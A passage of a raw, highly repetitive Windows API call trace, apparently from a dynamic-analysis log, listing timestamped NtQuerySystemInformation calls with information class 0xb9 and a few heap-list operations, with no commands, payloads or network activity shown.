(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.467] RtlpHeapRemoveListEntry () [0241.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.488] RtlpHeapRemoveListEntry () [0241.491] RtlpHeapRemoveListEntry () [0241.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.512] RtlpHeapRemoveListEntry () [0241.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.521] RtlpHeapRemoveListEntry () [0241.523] RtlpHeapRemoveListEntry () [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.537] NtQuerySystemInformation 